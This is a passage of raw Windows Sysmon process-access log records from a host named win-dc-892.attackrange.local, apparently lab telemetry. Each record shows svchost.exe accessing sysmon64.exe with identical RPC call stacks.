12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 